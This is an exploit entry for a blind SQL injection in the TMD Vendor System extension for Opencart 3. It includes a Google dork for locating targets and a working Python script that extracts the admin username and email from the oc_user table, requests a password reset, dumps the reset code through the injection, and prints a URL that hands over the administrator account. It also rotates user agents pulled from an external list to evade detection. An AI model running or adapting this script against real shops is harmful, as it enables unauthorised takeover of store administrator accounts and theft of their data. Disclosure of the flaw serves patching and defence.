Opencart 3 Extension TMD Vendor System - Blind SQL Injection

# Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection
# Author: Muhammad Zaki Sulistya ([email protected])
# Date: 03-11-2021
# Product: TMD Vendor System
# Vendor Homepage: https://www.opencartextensions.in/
# Software Link: https://www.opencartextensions.in/opencart-multi-vendor-multi-seller-marketplace
# Version: TMD Vendor System 3.x
# Tested on: MacOS
# Google Dork: inurl:index.php?route=vendor/allseller
# Info: Patched on the new version

#!/usr/bin/python
import requests
from bs4 import BeautifulSoup
from random import randint
import time

class TmdSqli:
    def __init__(self, url):
        self.char_list = ['.',':', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
        self.url = url
        self.user_agents = []
        self.set_user_agent()
        self.is_vulnerable()

    def set_user_agent(self):
        if len(self.user_agents) == 0:
            r = requests.get(
                'https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt').text
            self.user_agents = r.split("\n")

    def get_content(self, url):
        try:
            n = randint(0, 999)
            headers = {}
            headers['user-agent'] = self.user_agents[n]
            req = requests.get(url, headers=headers)
            soup = BeautifulSoup(req.content, 'html.parser')
            return soup.find(id='content')
        except requests.exceptions.ConnectionError as e:
            print("CONNECTION ERROR:", e)
            time.sleep(60)
            self.get_content(url)

    def is_vulnerable(self):
        url_injection_true = self.url + "' AND 1=1--+-"
        url_injection_false = self.url + "' AND 1=0--+-"

        default_response = self.get_content(self.url)
        injection_true = self.get_content(url_injection_true)
        injection_false = self.get_content(url_injection_false)

        if (default_response == injection_true) and (default_response != injection_false):
            print("The target is vulnerable")
            self.injection_true = injection_true
            row_length = self.user_data_length()
            self.dump_data(row_length)
        else:
            print("Not vulnerable")

    def user_data_length(self):
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(username,0x3a,email)) FROM oc_user LIMIT 0,1)=" + str(n) + "--+-"
            req = self.get_content(request_url)
            if req != self.injection_true:
                n += 1
            else:
                print("Row length : " + str(n))
                return n
                break

    def reset_code_length(self):
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(code)) FROM oc_user WHERE username = '" + self.username + "')=" + str(
                n) + "--+-"
            req = self.get_content(request_url)
            if req != self.injection_true:
                n += 1
            else:
                print("Row length : " + str(n))
                return n
                break

    def dump_data(self, length):
        data = ""
        for i in range(1, length + 1):
            for j in self.char_list:
                j = ord(j)
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(username,0x3a,email), " + str(i) + ",1)) FROM oc_user LIMIT 0,1)=" + str(j) + "--+-"
                req = self.get_content(request_url)
                if req == self.injection_true:
                    data += chr(j)
                    print("Get : " + data)
        user_data = data.split(":")
        self.username = user_data[0]
        self.email = user_data[1]
        self.reset_password()

    def dump_reset_code(self, length):
        data = ""
        for i in range(1, length + 1):
            for j in self.char_list:
                j = ord(j)
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(code), " + str(
                    i) + ",1)) FROM oc_user WHERE username = '" + self.username + "')=" + str(j) + "--+-"
                req = self.get_content(request_url)
                if req == self.injection_true:
                    data += chr(j)
                    print("Get : " + data)
        return data

    def reset_password(self):
        self.admin_page = input("Admin page URL : ")
        request_url = self.admin_page + '/index.php?route=common/forgotten'
        post_data = {'email':self.email}
        req = requests.post(request_url, data=post_data)
        if req.status_code == 200:
            row_length = self.reset_code_length()
            reset_code = self.dump_reset_code(row_length)
            reset_password_url = self.admin_page + '/index.php?route=common/reset&code=' + reset_code
            print("Gotcha!")
            print("username : " + self.username)
            print("You can reset the password : " + reset_password_url)

print("TARGET URL ex: https://[redacted]]/index.php?route=product/product&product_id=[product_id]")
target = input("Target URL : ")
TmdSqli(target)